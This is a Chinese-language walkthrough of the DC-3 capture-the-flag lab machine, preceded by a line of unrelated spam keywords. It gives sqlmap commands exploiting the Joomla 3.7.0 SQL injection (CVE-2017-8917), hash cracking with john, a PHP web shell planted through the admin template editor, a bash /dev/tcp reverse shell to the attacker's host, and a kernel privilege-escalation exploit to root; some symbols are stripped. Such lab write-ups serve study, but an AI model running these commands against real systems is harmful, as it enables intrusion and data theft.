有域名 如何免费建设网站,手机网页版微信登录入口,现在出入郑州最新规定,凡科建站代理入口DC-3
January 3, 2024 4:11 PM Tags#xff1a;Joomla owner#xff1a;只惠摸鱼
信息收集 探测靶机ip#xff1a; 192.168.199.133 nmap 扫描端口、 系统版本 漏洞 发现只有80端口开发#xff0c; 且有cve-2017-8917漏洞存在是Joomla的SQL注入漏洞 Joomla版本为3.7.0…DC-3
January 3, 2024 4:11 PM TagsJoomla owner只惠摸鱼
信息收集 探测靶机ip 192.168.199.133 nmap 扫描端口、 系统版本 漏洞 发现只有80端口开发 且有cve-2017-8917漏洞存在是Joomla的SQL注入漏洞 Joomla版本为3.7.0 打开页面看一下发现有登录页面可以尝试弱口令sql注入 或 爆破页面有提示。只有一个flag且为root权限才能看到 尝试弱口令无果
漏洞利用
使用kali中searchsploit 搜索cve-2017-8917 即搜索joomla 3.7.0的漏洞 查看内容 searchsploit -x php/webapps/42033.txt 发现可以直接使用sqlmap 爆数据库
SQLmap爆数据
爆数据库默认配置选项 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent --dbs -p list[fullordering] 得到数据库joomladb 爆数据库表 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” --tables --batch -p list[fullordering] —batch是为了使其默认使用默认配置选项 得到表#__users 爆表字段名不能使用默认需要手动y一下 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering] 只需查字段username 和 password中的值就可以了 爆数据 sqlmap -u “http://192.168.199.133/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml” --risk3 --level5 --random-agent -D “joomladb” -T “#__users” -C “username,password” --dump -p list[fullordering] 拿到admin账号 和一个 hash加密的密码
john解密 密码$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu放入txt文档 使用john进行解密 得到管理员账户密码 发现还没有扫过目录扫一下看看是不是有管理员登录端80端口只有用户端 dirb http://192.168.199.133 发现有管理员页面 使用刚才得到的管理员账号密码登录进入后端管理页面 寻找是否有能上传文件的地方尝试了一些都不太行最后找到了一个可以直接写php代码的页面。 新增一个php文件类型写入一句话木马 发现上方有提示的路径尝试直接访问一下 发现不通 百度了joomla的文件路径 发现一个熟悉的单词 尝试用这个试一下没报错有戏 继续尝试目录或文件发现没报错。 尝试一下phpinfo()成功 使用蚁剑直接连接 成功连接 打开命令端口发现不是root 也不是管理员权限
提权 查看系统内核版本 直接使用searchsploit Ubuntu 16.04查询相关漏洞对比内核版本和漏洞类型使用39772 查看漏洞内容最上面的连接可以直接拉到浏览器查看详细信息个人认为比较方便 searchsploit -x linux/local/39772.txt 根据漏洞信息和下方提供的漏洞下载链接下载到kali通过蚁剑上传到后台解压exploit这里是我运行过一次 将shell反弹给本地 本地监听1234端口 被控端运行bash -c bash -i /dev/tcp/192.168.199.129/1234 01’ 本地得到shell 进入到ebpf_mapfd_doubleput_exploit运行./compile.sh会生成doubleput 然后再运行./doubleput等待数秒得到root权限 生成交互性shell python3 -c import pty; pty.spawn(“/bin/bash”)’ 进入/root 查询文件找到flag。